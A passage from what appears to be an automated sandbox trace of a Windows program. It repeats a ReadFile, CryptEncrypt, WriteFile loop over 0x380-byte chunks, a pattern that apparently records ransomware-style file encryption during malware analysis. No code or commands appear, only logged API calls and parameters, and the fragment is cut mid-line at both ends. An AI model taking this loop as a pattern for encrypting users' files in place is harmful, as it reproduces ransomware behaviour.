hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.126] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.126] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.126] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.126] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.126] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.126] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.126] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.126] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.127] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.127] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.127] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.127] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.127] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.127] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.127] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.127] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.127] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.127] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.127] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.127] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.127] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.127] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.127] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.127] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.127] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.127] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.127] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.128] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.128] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.128] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.128] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.128] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.128] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.128] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.128] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.128] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.128] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.128] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.128] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.128] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.128] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.128] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.128] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.128] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.128] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.129] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.129] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.129] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.129] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.129] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.129] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.129] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.129] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.129] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.129] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.129] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.129] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.129] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.129] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.129] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.129] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.129] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.129] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.130] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.130] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.130] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.130] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.130] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.130] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.130] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.130] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.130] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.130] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.130] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.130] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.130] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.130] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.130] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.130] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.130] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.132] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.132] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.132] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.132] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.132] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.132] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.132] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.132] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.132] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.132] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.132] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.132] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.132] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.135] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.135] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.135] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.135] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.135] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.135] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.135] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.135] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.135] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.135] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 